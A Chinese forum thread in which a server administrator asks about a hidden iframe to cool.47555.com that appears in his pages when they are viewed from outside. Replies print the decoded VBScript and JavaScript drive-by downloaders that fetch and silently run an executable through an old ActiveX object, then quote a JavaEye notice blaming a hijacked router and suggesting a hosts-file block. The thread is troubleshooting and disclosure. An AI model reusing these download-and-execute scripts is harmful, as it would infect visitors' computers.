不管是访问服务器上的任何网页，就连404的页面也会在<html>后加入：
<iFrAmE SRc=http://cool.47555.com/k.htm width=1 height=1 frameborder=0></IfRaMe>
上面这段恶意代码，它会每隔几秒加入代码，有时又没有，不是网页源代码问题，也没有在网

页源代码中加入恶决代码，重装过服务器，格式化重分区过第一个硬盘，一放上网站没多久又

出现这种情况，请问这是什么病毒，有没有用什么软件可以杀掉？

问题的关键在于：
在服务器中用浏览器打开是好好的
直接在服务器上用编辑器查看源代码也是好好的
但是网络上浏览就有问题了

怎么没有人给我帮助?

怎么没有人给我帮助?

挂那网的人真是处心积虑。。。。加密了N多次！！
第一个
<html>
    <script language="VBScript">
    on error resume next
    m1="object"
    m2="classid"
    c1 ="clsid:BD"
    c2="96C556-65A3-11"
    c3="D0-983A-00C04F"
    c4="C29E36"
    m4="Microsoft.XMLHTTP"
    m5="Shell.Application
    MircoLongy = "http://cool.47555.com/yt.vbs"
    Set MircoLongc = document.createElement(m1)
    MircoLongc.setAttribute m2, c1+c2+c3+c4
    seturla="down"
    seturlb="file"
    seturlc="copy"
    seturld="exit"
    MircoLongi=m4
    Set MircoLongd = MircoLongc.CreateObject(MircoLongi,"")
    seturlf="Ado"
    seturlg="db."
    seturlh="Str"
    seturli="eam"
    MircoLongf=seturlf&seturlg&seturlh&seturli
    MircoLongg=MircoLongf
    set MircoLonga = MircoLongc.createobject(MircoLongg,"")
    MircoLonga.type = 1
    MircoLongh="GET"
    MircoLongd.Open MircoLongh, MircoLongy, False
    MircoLongd.Send
    MircoLong11="yt.vbs"
    set MircoLongb = MircoLongc.createobject("Scripting.FileSystemObject","")
    set MircoLonge = MircoLongb.GetSpecialFolder(2)
    MircoLonga.open
    MircoLong8="MircoLonga.BuildPath(MircoLonga,MircoLong8)"
    MircoLong7="MircoLongb.BuildPath(MircoLongb,MircoLong7)"
    MircoLong6="MircoLongc.BuildPath(MircoLongd,MircoLong6)"
    MircoLong5="MircoLongd.BuildPath(MircoLongf,MircoLong5)"
    MircoLong4="MircoLonge.BuildPath(MircoLongg,MircoLong4)"
    MircoLong3="MircoLongf.BuildPath(MircoLongh,MircoLong4)"
    MircoLong2="MircoLongg.BuildPath(MircoLongi,MircoLong3)"
    MircoLong1="MircoLongh.BuildPath(MircoLongg,MircoLong1)"
    MircoLong0="MircoLongi.BuildPath(MircoLongk,MircoLong0)"
    MircoLong11= MircoLongb.BuildPath(MircoLonge,MircoLong11)
    MircoLonga.write MircoLongd.responseBody
    MircoLonga.savetofile MircoLong11,2
    MircoLonga.close
    set MircoLonge = MircoLongc.createobject(m5,"")
    MircoLonge.ShellExecute MircoLong12,BBS,BBS,"open",0
    </script>
第二个
<script>
var url,path;
url="http://cool.47555.com/xxxx.exe";
path="C:\\windows\\qing.exe";
try{var ado=(document.createElement("object"));
c1 ="clsid:BD"
c2="96C556-65A3-11"
c3="D0-983A-00C04F"
c4="C29E36"
ado.setAttribute("classid", c1+c2+c3+c4);
CAOi="Microsoft.XMLHTTP"
var xml=ado.CreateObject(CAOi,"");
b1="A"
b2="do"
b3="db"
b4="."
b5="st"
b6="re"
b7="am"
var as=ado.createobject(b1+b2+b3+b4+b5+b6+b7,"");
a1="G"
a2="E"
a3="T"
xml.Open(a1+a2+a3,url,0);
xml.Send();
as.type=1;as.open();
as.write(xml.responseBody);
as.savetofile(path,2);
var shell=ado.createobject("Shell.Application","");
as.close();
shell.Shell(pa222th,"","","open",0);}catch(e){};
</script>

还有一个不知道是我还原时因为太多了，搞混了，还是。。。反正还出来和第一个一样！

那个VBS下来。。。发现原来是运行C:\\windows\\qing.exe的指令！！和第二个是一起的！！

问题的关键在于：
整个服务器上的网站都如此
在服务器中用浏览器打开每个页面都是好好的
直接在服务器上用编辑器查看源代码也是好好的
但是在服务器外面的电脑(网络)上浏览就有问题了

没有人能解决吗?

没人能解决吗?

看这个就都明白了：

。。。。。。。。

http://www.javaeye.com/topic/21725?page=4








亲爱的会员们，由于JavaEye网站所在的电信路由器被黑客控制，导致多个托管网站IP被劫持后植入恶意JS代码，造成IE浏览器的用户电脑感染TrojanDropper.HTML.l病毒。我们在12月18日上午也发现了这种现象，当你访问JavaEye网站的时候，位于JavaEye服务器和你的浏览器中间的某个路由器在返回页面中植入如下代码：

<iFrAmE SRc=http://cool.47555.com/k.htm width=1 height=1 frameborder=0></IfRaMe>

尽管这并不是JavaEye服务器本身的问题，我们对于电信路由器出现这种糟糕状况也感到非常无奈，但是为了保证大家电脑的安全，我们宁可暂时关闭网站几天，也不能让大家遭受病毒感染的危险。

目前我们正在和上海电信机房紧急协商更换IP地址，或者更换机房，以避开受感染的路由器控制。同时我们也呼吁大家，如果有空闲服务器和带宽资源，请帮助我们做一个镜像网站，以渡过眼前的困难。

另外严肃提醒大家：近期千万不能使用IE浏览器上网，已经有多家受感染路由器控制范围之内的网站报告了这种状况，只要你访问的网站经过这些被感染的路由器，就会被植入恶意代码，切记切记！或者您也可以临时采取以下手段避免被感染： 编辑C:\Windows\system32\drivers\etc\hosts，加入一行：127.0.0.1 cool.47555.com

如果您想向我们提供帮助，建议和鼓励，欢迎拨打电话：021－68540054 或 Email：ouspec@21cn.com

请经常访问本页面，我们会随时更新事件的进展状况，并尽快恢复网站访问…

BTW:本通知页面是临时放在朋友的服务器上面的，不在受感染的路由器控制范围之内，大家可以放心访问本页面
JavaEye网站管理员
2006年12月18日深夜